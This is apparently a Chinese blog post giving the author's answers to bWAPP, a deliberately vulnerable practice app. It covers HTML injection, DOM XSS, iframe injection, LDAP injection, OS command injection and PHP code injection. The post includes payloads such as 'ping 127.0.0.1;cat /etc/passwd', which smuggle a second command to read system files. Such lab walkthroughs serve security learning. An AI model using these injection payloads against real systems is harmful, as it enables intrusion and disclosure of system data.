小编在刚开始学习web安全的时候也是很迷茫,还好有两个比较好的漏洞演练平台,第一个接触的是DVWA,第二个是Bwapp,第二个对我本人的帮助很大,之前有做了很多个答案,现在把自己做的答案公布出来(由于环境漏洞数量太多,就分多次发布),希望对小白有所帮助。
***********************注入*********************
输入框输入:<a href=http://www.baidu.com>点这里</a>
输入框:<a href=http://www.baidu.com>点输入这里</a>
原始URL:http://10.X.X.X/bWAPP/htmli_current_url.php
漏洞URL:http://10.93.1.155/bWAPP/htmli_current_url.php#<h1>XSS DOM</h1>
输入框输入:<a href=http://www.baidu.com>点这里</a>
在留言板出现:点这里
点击之后跳转至百度
漏洞文件:robots.txt
原始URL:
http://10.93.1.46/bWAPP/iframei.php?ParamUrl=robots.txt&ParamWidth=250&ParamHeight=250
漏洞URL:
http://10.93.1.46/bWAPP/iframei.php?ParamUrl=http://www.baidu.com&ParamWidth=250&ParamHeight=250
LDAP:轻量目录访问协议
LDAP注入
LDAP注入攻击和SQL注入攻击相似,因此接下来的想法是利用用户引入的参数生成LDAP查询。一个安全的Web应用在构造和将查询发送给服务器前应该净化用户传入的参数。在有漏洞的环境中,这些参数没有得到合适的过滤,因而攻击者可以注入任意恶意代码。 使用得最广泛的LDAP:ADAM和OpenLDAP。
资料:http://blog.csdn.net/qq_19876131/article/details/50577355
邮件头注入,这个希望有大佬做出来的跟小编一起交流下
在输入框里面输入
www.nsa.gov;dir
www.nsa.gov&&dir
原理:在DNS查询之后在执行dir命令
猜测是target参数可以注入
输入ping 127.0.0.1
在输入ping 127.0.0.1;cat /etc/passwd
漏洞参数:message
漏洞原理URL:
http://10.93.1.46/bWAPP/phpi.php?message
漏洞URL:
http://10.93.1.46/bWAPP/phpi.php?message=phpinfo()